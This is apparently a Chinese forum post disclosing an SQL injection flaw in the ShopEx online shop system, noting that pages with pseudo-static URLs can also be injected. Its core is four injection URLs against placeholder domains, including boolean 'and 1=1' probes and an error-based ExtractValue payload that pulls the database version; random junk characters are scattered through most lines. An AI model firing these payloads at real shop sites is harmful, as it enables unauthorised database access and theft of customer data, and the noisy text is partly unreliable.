注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… ! r1 U V$ ^. j( k. k
# ]4 w) n) ~: t2 A8 d, D- j% d好吧,我扯远了~~
% L ~ x; q- ~# c其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~9 A+ v; s K1 l/ C2 y) H7 C
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
2 e& Z7 ~4 d" n6 y7 v! T& t* v9 ?6 K. [' ~1 `; ]* @3 Q
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html - ]( ^% a% p$ v2 Q; T
6 y1 w7 i9 S3 [2 m" N/ K' _: |http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 1 W" l% D% f9 ]! G a P8 N
+ G! k3 S0 z% t% L: o
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 2 B+ |% A. d( m( ~3 Q( @; y6 f
3 _7 }; g: p& H/ M5 S+ r
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
1 x i1 p, s. ]( W3 g0 ?6 [9 a7 [ N9 n9 {4 ]# g! e* l q
; ?3 Q8 W8 w1 `, F7 C一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。0 Q7 g1 @; q7 p& C
如何注入就不多说了,10多年的东西了…不会也会了…
; O/ ?0 y- F) d. z7 y- x0 B
% W& t& `* T- ]$ t3 y) C8 B/ M
7 y! p) F+ _3 d0 q
2 {4 |6 ^9 f0 y
( h0 K: w' i- _' X |